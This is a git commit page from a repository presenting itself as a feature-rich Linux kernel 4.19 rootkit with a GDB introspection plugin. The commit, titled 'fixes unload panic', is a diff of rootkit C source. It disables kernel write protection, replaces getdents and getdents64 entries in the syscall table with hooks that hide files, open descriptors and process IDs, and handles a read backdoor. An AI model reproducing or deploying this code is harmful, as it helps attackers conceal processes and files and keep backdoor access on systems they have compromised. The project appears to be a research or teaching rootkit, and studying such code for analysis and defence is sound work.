linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit b473b83b5c4cf55cf529b0dba4c70da4f28318f3
parent e061720c0026bdfa1da05947348dc579dcde4db5
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 14:13:19 +0100

fixes unload panic

Diffstat:
Msrc/filehide.c | 4+++-
Msrc/hook.c | 14++++++++++----
Msrc/openhide.c | 4+++-
Msrc/pidhide.c | 4+++-
4 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/src/filehide.c b/src/filehide.c
@@ -14,7 +14,9 @@ void hide_files(void)
 {
- if (atomic_inc_return(&getdents_install_count) == 1) {
+ if (atomic_inc_return(&getdents_install_count) >= 1) {
+ atomic_set(&getdents_install_count, 1);
+ disable_protection();
 sys_calls[__NR_getdents] = (void *)g7_getdents;
 sys_calls[__NR_getdents64] = (void *)g7_getdents64;
diff --git a/src/hook.c b/src/hook.c
@@ -72,10 +72,8 @@ init_hooks(void)
 if (rootkit.hiding_open)
 hide_open();
- if (rootkit.hiding_pids) {
- clear_hidden_pids();
- unhide_pids();
- }
+ if (rootkit.hiding_pids)
+ hide_pids();
 if (rootkit.backdoor == BD_READ)
 backdoor_read();
@@ -92,6 +90,14 @@ remove_hooks(void)
 if (rootkit.hiding_files)
 unhide_files();
+ if (rootkit.hiding_open)
+ unhide_open();
+
+ if (rootkit.hiding_pids) {
+ clear_hidden_pids();
+ unhide_pids();
+ }
+
 if (rootkit.backdoor != BD_OFF)
 unbackdoor();
 }
diff --git a/src/openhide.c b/src/openhide.c
@@ -26,7 +26,9 @@ fd_list_t_ptr hidden_fds_tail = &hidden_fds;
 void hide_open(void)
 {
- if (atomic_inc_return(&getdents_install_count) == 1) {
+ if (atomic_inc_return(&getdents_install_count) >= 1) {
+ atomic_set(&getdents_install_count, 1);
+ disable_protection();
 sys_calls[__NR_getdents] = (void *)g7_getdents;
 sys_calls[__NR_getdents64] = (void *)g7_getdents64;
diff --git a/src/pidhide.c b/src/pidhide.c
@@ -15,7 +15,9 @@ pid_list_t_ptr hidden_pids_tail = &hidden_pids;
 void hide_pids(void)
 {
- if (atomic_inc_return(&getdents_install_count) == 1) {
+ if (atomic_inc_return(&getdents_install_count) >= 1) {
+ atomic_set(&getdents_install_count, 1);
+ disable_protection();
 sys_calls[__NR_getdents] = (void *)g7_getdents;
 sys_calls[__NR_getdents64] = (void *)g7_getdents64;